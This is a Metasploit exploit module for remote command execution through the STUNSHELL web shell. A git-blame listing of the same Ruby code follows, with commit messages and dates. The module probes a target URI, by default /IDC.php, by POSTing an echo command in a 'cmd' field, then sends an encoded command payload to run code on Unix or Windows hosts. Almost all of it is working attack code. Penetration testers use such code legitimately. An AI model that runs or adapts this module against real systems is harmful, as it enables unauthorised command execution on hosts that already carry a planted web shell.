modules/exploits/multi/http/stunshell_exec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'STUNSHELL Web Shell Remote Code Execution',
        'Description' => %q{
          This module exploits unauthenticated versions of the "STUNSHELL" web shell.
          This module works when safe mode is disabled on the web server.  This shell is
          widely used in automated RFI payloads.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'bwall <bwall[at]openbwall.com>' # vuln discovery & msf module
        ],
        'References' => [
          ['OSVDB', '91842'],
          ['URL', 'https://defense.ballastsecurity.net/wiki/index.php/STUNSHELL'],
          ['URL', 'https://defense.ballastsecurity.net/decoding/index.php?hash=a4cd8ba05eb6ba7fb86dd66bed968007']
        ],
        'Privileged' => false,
        'Payload' => {
          'Space' => 10000, # Value determined by web server's POST limits
          'BadChars' => '',
          'DisableNops' => true,
          'Compat' =>
                        {
                          'PayloadType' => 'cmd'
                        }
        },
        'Platform' => %w{unix win},
        'Arch' => ARCH_CMD,
        'Targets' => [
          ['stunshell / Unix', { 'Platform' => 'unix' } ],
          ['stunshell / Windows', { 'Platform' => 'win' } ]
        ],
        'DisclosureDate' => '2013-03-23',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, "The path to the andalas_oku shell", "/IDC.php"]),
      ]
    )
  end

  def check
    uri = normalize_uri(target_uri.path.to_s)
    request_parameters = {
      'method'	=> 'POST',
      'uri'	=> uri,
      'vars_post'	=>
        {
          'cmd' => "echo 'andalas_oku test parameter'"
        }
    }
    shell = send_request_cgi(request_parameters)
    if (shell and shell.body =~ /andalas_oku test parameter/)
      return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe
  end

  def http_send_command(cmd)
    uri = normalize_uri(target_uri.path.to_s)
    request_parameters = {
      'method'	=> 'POST',
      'uri'	=> uri,
      'vars_post'	=>
        {
          'cmd' => cmd
        }
    }
    res = send_request_cgi(request_parameters)
    if not (res and res.code == 200)
      fail_with(Failure::Unknown, 'Failed to execute the command.')
    end
  end

  def exploit
    http_send_command(payload.encoded)
  end
end
Added license information and tidied up code 2013-03-25 00:03:32 -04:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Added license information and tidied up code 2013-03-25 00:03:32 -04:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
Moved module and cleaned code 2013-03-27 17:03:18 -04:00			`Rank = GreatRanking`
Added STUNSHELL webshell remote command execution module 2013-03-24 15:18:08 -04:00
			`include Msf::Exploit::Remote::HttpClient`

Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`def initialize(info = {})`
			`super(`
			`update_info(`
			`info,`
			`'Name' => 'STUNSHELL Web Shell Remote Code Execution',`
			`'Description' => %q{`
cleanup for stunshell_exec 2013-03-28 14:45:51 +01:00			`This module exploits unauthenticated versions of the "STUNSHELL" web shell.`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`This module works when safe mode is disabled on the web server. This shell is`
			`widely used in automated RFI payloads.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' => [`
cleanup for stunshell_exec 2013-03-28 14:45:51 +01:00			`'bwall <bwall[at]openbwall.com>' # vuln discovery & msf module`
Added STUNSHELL webshell remote command execution module 2013-03-24 15:18:08 -04:00			`],`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'References' => [`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`['OSVDB', '91842'],`
Added STUNSHELL webshell remote command execution module 2013-03-24 15:18:08 -04:00			`['URL', 'https://defense.ballastsecurity.net/wiki/index.php/STUNSHELL'],`
Removed extra comma 2013-03-27 17:15:34 -04:00			`['URL', 'https://defense.ballastsecurity.net/decoding/index.php?hash=a4cd8ba05eb6ba7fb86dd66bed968007']`
Added STUNSHELL webshell remote command execution module 2013-03-24 15:18:08 -04:00			`],`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Privileged' => false,`
			`'Payload' => {`
			`'Space' => 10000, # Value determined by web server's POST limits`
Added STUNSHELL webshell remote command execution module 2013-03-24 15:18:08 -04:00			`'BadChars' => '',`
			`'DisableNops' => true,`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Compat' =>`
			`{`
			`'PayloadType' => 'cmd'`
			`}`
Added STUNSHELL webshell remote command execution module 2013-03-24 15:18:08 -04:00			`},`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Platform' => %w{unix win},`
			`'Arch' => ARCH_CMD,`
			`'Targets' => [`
Moved module and cleaned code 2013-03-27 17:03:18 -04:00			`['stunshell / Unix', { 'Platform' => 'unix' } ],`
			`['stunshell / Windows', { 'Platform' => 'win' } ]`
			`],`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'DisclosureDate' => '2013-03-23',`
Adds sentinel values to modules missing notes 2025-06-23 12:00:29 +01:00			`'DefaultTarget' => 0,`
			`'Notes' => {`
Update info -d markdown 2025-06-23 12:43:46 +01:00			`'Reliability' => UNKNOWN_RELIABILITY,`
			`'Stability' => UNKNOWN_STABILITY,`
			`'SideEffects' => UNKNOWN_SIDE_EFFECTS`
Adds sentinel values to modules missing notes 2025-06-23 12:00:29 +01:00			`}`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`)`
			`)`
Added STUNSHELL webshell remote command execution module 2013-03-24 15:18:08 -04:00
			`register_options(`
			`[`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`OptString.new('TARGETURI', [true, "The path to the andalas_oku shell", "/IDC.php"]),`
			`]`
			`)`
Added STUNSHELL webshell remote command execution module 2013-03-24 15:18:08 -04:00			`end`

			`def check`
cleanup for stunshell_exec 2013-03-28 14:45:51 +01:00			`uri = normalize_uri(target_uri.path.to_s)`
Added STUNSHELL webshell remote command execution module 2013-03-24 15:18:08 -04:00			`request_parameters = {`
Moved module and cleaned code 2013-03-27 17:03:18 -04:00			`'method' => 'POST',`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'uri' => uri,`
Moved module and cleaned code 2013-03-27 17:03:18 -04:00			`'vars_post' =>`
Added STUNSHELL webshell remote command execution module 2013-03-24 15:18:08 -04:00			`{`
			`'cmd' => "echo 'andalas_oku test parameter'"`
			`}`
			`}`
			`shell = send_request_cgi(request_parameters)`
			`if (shell and shell.body =~ /andalas_oku test parameter/)`
			`return Exploit::CheckCode::Vulnerable`
			`end`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00
Added STUNSHELL webshell remote command execution module 2013-03-24 15:18:08 -04:00			`return Exploit::CheckCode::Safe`
			`end`

Moved module and cleaned code 2013-03-27 17:03:18 -04:00			`def http_send_command(cmd)`
cleanup for stunshell_exec 2013-03-28 14:45:51 +01:00			`uri = normalize_uri(target_uri.path.to_s)`
Added STUNSHELL webshell remote command execution module 2013-03-24 15:18:08 -04:00			`request_parameters = {`
Moved module and cleaned code 2013-03-27 17:03:18 -04:00			`'method' => 'POST',`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'uri' => uri,`
Moved module and cleaned code 2013-03-27 17:03:18 -04:00			`'vars_post' =>`
Added STUNSHELL webshell remote command execution module 2013-03-24 15:18:08 -04:00			`{`
			`'cmd' => cmd`
			`}`
			`}`
			`res = send_request_cgi(request_parameters)`
			`if not (res and res.code == 200)`
Switch to Failure vs Exploit::Failure 2013-08-15 14:14:46 -05:00			`fail_with(Failure::Unknown, 'Failed to execute the command.')`
Added STUNSHELL webshell remote command execution module 2013-03-24 15:18:08 -04:00			`end`
			`end`

			`def exploit`
			`http_send_command(payload.encoded)`
			`end`
			`end`